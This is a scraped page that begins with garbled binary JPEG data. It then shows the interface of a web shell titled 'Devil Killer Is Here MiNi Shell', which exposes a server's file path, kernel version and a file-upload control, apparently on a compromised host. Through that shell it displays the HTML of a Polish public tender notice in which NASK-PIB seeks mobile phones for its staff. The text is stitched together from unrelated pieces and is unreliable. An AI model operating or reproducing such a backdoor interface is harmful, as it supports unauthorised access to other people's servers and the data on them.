JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210505/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210505/0004684702-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00046847 z dnia 2021-05-05</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa telefonów komórkowych dla pracowników NASK-PIB” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NAUKOWA I AKADEMICKA SIEĆ KOMPUTEROWA - PAŃSTWOWY INSTYTUT BADAWCZY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 010464542</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Kolska 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">0048 22 3808200</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@nask.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.nask.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> telekomunikacja/IT </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa telefonów komórkowych dla pracowników NASK-PIB” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-22c0e56b-7b27-11eb-86b1-a64936a8669f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00046847</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt nr POPC.01.01.00-00-0001/18; Budowa sieci dostępu do Internetu Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0002/18; Budowa szkolnych sieci dostępowych Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0003/18 Programu Operacyjnego Polska Cyfrowa na lata 2014-2020, Oś Priorytetowa nr 1 „Powszechny dostęp do szybkiego Internetu” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://nask.eb2b.com.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://nask.eb2b.com.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę naPlatformietj.:1) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s;2)Komputer klasy PC lub MAC, o następującej minimalnej konfiguracji: pamięć 2GB RAM,procesor IntelIV 2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux;3)Zainstalowanadowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja10.0;4) Włączonaobsługa JavaScript;5) Zainstalowany program AcrobatReader lub inny odczytującypliki w formacie np.pdf, .doc, .docx, .xls, .xlsx.6) dopuszczalna wielkość przesyłanych pojedynczychplików do 50MB.Dokumenty w formacie ,,PDF” zaleca się podpisywać formatem PAdES; natomiastdokumenty wformacie innym niż ,,PDF” zaleca się podpisywać formatem XAdES.Zamawiający określainformacje natemat kodowania i czasu odbioru danych:1) Plik załączony przez Wykonawcę naPlatformie i zapisany,nie jest widoczny dla Zamawiającego oraz właściciela Platformy, gdyż istnieje wsystemie jakozaszyfrowany. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniuprzezZamawiającego po upływie terminu składania ofert.2) Oznaczenie czasu odbioru danychprzezPlatformę stanowi przypiętą do dokumentu elektronicznego datę oraz dokładny czas(hh:mm:ss),znajdującą się po lewej stronie dokumentu w kolumnie „Data przesłania”.Zamawiającykieruje ew.wezwania/pisma do Wykonawcy za pośrednictwem Platformy w zakładce„Pytania/Informacje”.Docelowy plik skierowany do Wykonawcy widoczny będzie w podzakładce„Otrzymane”.Dokumentyskładane na wezwanie Zamawiającego, Wykonawca wczytuje w oryginale lubkopii poświadczonej zazgodność z oryginałem opatrzone kwalifikowanym podpisem elektronicznym,podpisem zaufanym lubpodpisem osobistym na Platformie w zakładce „Pytania/Informacje (podzakładka „Dodajpytanie/komentarz”). Wykonawca w niniejszej podzakładce wybiera docelowy plik,który ma zostaćwczytany. Po wczytaniu pliku wybiera opcję „Zapisz”.Wykonawca składa ofertę poprzezdodanie wzakładce „Załączniki” dokumentów (załączników) określonych w niniejszej SWZ ipodpisanychkwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistympoprzezwybranie polecenia „Dodaj załącznik” i wybranie docelowego pliku, który ma zostaćzamieszczony.Wykonawca winien opisać załącznik nazwą umożliwiającą jego identyfikację. Wprzypadku, gdyzałącznik zwiera tajemnicę przedsiębiorstwa/dane osobowe Wykonawca zaznaczastosowne polecenie„Załącznik stanowiący tajemnicę przedsiębiorstwa” / „Załącznik zawiera daneosobowe”,2)Potwierdzeniem prawidłowo złożonej oferty (dodania załącznika) jest automatycznewygenerowaniekomunikatu systemowego o treści „Plik został przesłany”, po każdej prawidłowowykonanej operacji tj.dodaniu i zapisaniu załącznika.3) O terminie złożenia oferty decyduje czaspełnego przeprocesowaniatransakcji na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuje, na podstawie art. 13 orazart.14Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016rokuwsprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych iwsprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(RODO),że:1)Administratorem przekazanych przez Państwa danych osobowych jest Zamawiający.NASK -PIBwyznaczył inspektora ochrony danych osobowych, z którym można skontaktować siępoprzez emailinspektorochronydanych@nask.pl;2) Państwa dane osobowe będą przetwarzane napodstawie art.6ust. 1 lit. c RODO, w celu związanym z postępowaniem o udzieleniezamówieniapublicznego;3)Państwa dane osobowe mogą być przekazywane organom państwowym,bankom,operatorompocztowym, podmiotom świadczącym dla Administratora usługi prawne,doradcze,podatkowe orazpodmiotom obsługującym systemy teleinformatyczne oraz innympodmiotomuprawnionym na mocyustawy Prawo zamówień publicznych (art. 74) przez określony czas(art. 78);4)Dane osoboweprzechowywane są przez Administratora dla celów archiwizacyjnych, zgodniezwewnętrznymiustaleniami, jak również do czasu przedawnienia ewentualnych roszczeń lubobronyprzezewentualnymi roszczeniami;5) Posiadają Państwo prawo dostępu do treści swoichdanychosobowychoraz prawo ich sprostowania, usunięcia, ograniczenia przetwarzania, prawodoprzenoszenia danych,prawo wniesienia sprzeciwu z zastrzeżeniem, że:a) Skorzystanie przezosobę,której dane osobowedotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowaw art.16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania oudzieleniezamówienia ani zmianąwzory umowy w sprawie zamówienia publicznego w zakresieniezgodnym zustawą;b) Wpostępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczeniaprzetwarzania, októrymmowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzaniadanychosobowych doczasu zakończenia tego postępowania;c) Zamawiający udostępnia daneosobowe, októrych mowa wart. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 zdnia 27kwietnia 2016 r. wsprawie ochrony osób fizycznych w związku z przetwarzaniem danychosobowych iw sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(ogólnerozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 4.05.2016, str. 1, z późn. zm.)),zwanegodalej„rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków ochronyprawnej, októrychmowa w SWZ, do upływu terminu na ich wniesienie,6) W przypadku stwierdzenia,żeprzetwarzaniePaństwa danych osobowych narusza przepisy RODO, przysługuje Państwu prawodowniesienia skargido Prezesa Urzędu Ochrony Danych Osobowych,7) Podanie danych osobowychjestdobrowolne, alekonieczne dla celów związanych z postępowaniem o udzieleniezamówienia,8)Decyzje dotycząceprzetwarzania danych osobowych nie będą podejmowane wsposóbzautomatyzowany. Administratornie profiluje danych osobowych,9) Państwa dane osobowe nie będą przekazywane poza terytoriumEuropejskiego Obszaru Gospodarczego</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZZPiZ.2111.5.2021.53.PKO[OSE-B][OSE-D][OSE-S][OSE2021]</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest:1)	sukcesywna dostawa fabrycznie nowych telefonów komórkowych, zwanych dalej: „Sprzętem” lub „Urządzeniem” dla NASK-PIB o wymaganiach minimalnych określonych w Rozdziale IV Załącznika nr 1 do SWZ-SOPZ, według 4 poniższych Grup:a)	Grupa A – telefony komórkowe – 2 szt., b)	Grupa B – telefony komórkowe – 4 szt.,c)	Grupa C – telefony komórkowe – 30 szt., d)	Grupa D – telefony komórkowe – 100 szt. 2)	Zapewnienie gwarancji dla Sprzętu, o którym mowa w pkt 1) przez okres co najmniej 24 miesięcy, liczonych od dnia podpisania Protokołu Odbioru Zamówienia Jednostkowego bez zastrzeżeń dla danego Zamówienia jednostkowego.2.	Szczegółowy opis przedmiotu zamówienia (zwany jako SOPZ) zawarty jest w Załączniku nr 1 do SWZ.3.	Planowana szacunkowa liczba Sprzętu, wskazana w ust. 1 pkt 1) powyżej, stanowi przewidywane przez Zamawiającego liczby zamawianego przez Zamawiającego Sprzętu przez cały okres trwania umowy. Zamawiający będzie zgłaszał poszczególne Zamówienia na dostawę Sprzętu za pomocą zamówień jednostkowych, o których mowa w § 7 Załącznika nr 5 do SWZ-wzoru umowy, zwanej dalej „Umową”.4.	Przedmiot zamówienia jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach projektów: Budowa węzłów bezpieczeństwa szkolnego ruchu internetowego Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0001/18; Budowa sieci dostępu do Internetu Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0002/18; Budowa szkolnych sieci dostępowych Ogólnopolskiej Sieci Edukacyjnej. Projekt nr POPC.01.01.00-00-0003/18 Programu Operacyjnego Polska Cyfrowa na lata 2014-2020, Oś Priorytetowa nr 1 „Powszechny dostęp do szybkiego Internetu” oraz ze środków budżetu państwa – dotacji celowej z Kancelarii Prezesa Rady Ministrów pt. Pełnienie zadań operatora Ogólnopolskiej Sieci Edukacyjnej, umowa nr 2/D/DT/2021.5.	Termin realizacji zamówienia wynosi 12 miesięcy, liczonych od dnia zawarcia Umowy, z zastrzeżeniem, że Sprzęt będzie dostarczany do Zamawiającego sukcesywnie, na podstawie jednostkowych Zamówień, o których mowa w § 7 ust. 1 Umowy. Terminy realizacji poszczególnych Zamówień będą każdorazowo wskazywane w formularzu Zamówienia, z uwzględnieniem § 7 ust. 1 pkt 2) Umowy.6.	W przypadku, gdy w opisie przedmiotu zamówienia zostały zastosowane odniesienia do norm, ocen technicznych, specyfikacji technicznych i systemów referencyjnych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 ustawy Pzp, zamawiający zgodnie z art. 101 ust. 4 ustawy Pzp dopuszcza zastosowanie rozwiązań równoważnych. Każdorazowo gdy wskazana jest w niniejszej SWZ norma, ocena techniczna, specyfikacja techniczna lub system referencji technicznych należy przyjąć, że w odniesieniu do nich użyto sformułowania „lub równoważne”.7.	Zamawiający nie dopuszcza możliwości prowadzenia negocjacji w celu ulepszenia treści ofert złożonych w odpowiedzi na ogłoszenie o zamówieniu.8.	Sposób oceny ofert: Zamawiający dokonuje wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu, złożonych w odpowiedzi na ogłoszenie o zamówieniu, będzie kierował się kryteriami i ich znaczeniem oraz będzie oceniał oferty w poszczególnych kryteriach. Zamawiający udzieli zamówienia Wykonawcy, którego Oferta uzyska największą liczbę punktów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32250000-0 - Telefony komórkowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert: Zamawiający dokonuje wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu, złożonych w odpowiedzi na ogłoszenie o zamówieniu, będzie kierował się kryteriami i ich znaczeniem oraz będzie oceniał oferty w poszczególnych kryteriach, o których mowa w Rozdziale XIV SWZ. Zamawiający udzieli zamówienia Wykonawcy, którego Oferta uzyska największą liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji Sprzętu (G)</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.	Wykonawca składa wraz z ofertą:1)	oświadczenie o braku podstaw do wykluczenia (wzór stanowi Załącznik nr 4 do SWZ).2.	Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia, w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień ich złożenia:W celu potwierdzenia spełniania warunków udziału w postępowaniu:Nie dotyczyW celu potwierdzenie braku podstaw wykluczenia z postępowania:1)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.3.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków.4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast:1)	dokumentu, o którym mowa w ust. 2 pkt 1) składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury. 2)	dokument, o którym mowa w ust. 2 pkt 1) powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.3)	Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 1), lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o których mowa w tym punkcie, zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Postanowienie pkt 2 stosuje się5.	Jeżeli wykonawca podlega wykluczeniu ze względu na zajście okoliczności wskazanych w przepisach znajdujących zastosowanie w postępowaniu – wykonawca przedkłada dowody, wskazujące na spełnienie przesłanek określonych w art. 110 ust 2 ustawy Pzp (samooczyszczenie).6.	Oświadczenie o braku podstaw do wykluczenia powinno być sporządzone w postaci elektronicznej z podpisem elektronicznym kwalifikowanym, podpisem zaufanym lub podpisem osobistym.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Oferta składa się z:1) Formularza Ofertowego (Załącznik nr 2 do SWZ)2) Formularzacenowego(Załącznik nr 3 do SWZ;3) oświadczenia o braku podstaw do wykluczenia (wzórstanowiZałącznik nr 4 do SWZ);4) Pełnomocnictwa wskazującego pełnomocnikawykonawcówwystępujących wspólnie (w wypadku złożenia oferty przez konsorcjum),5)Pełnomocnictwa dopodpisania oferty (w przypadku posługiwania się pełnomocnikiem) <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2. Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzieleniezamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówieniapublicznego.3. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.Pełnomocnictwo winno być dołączone do oferty.4. Żaden z wykonawców występującychwspólnie nie może podlegać 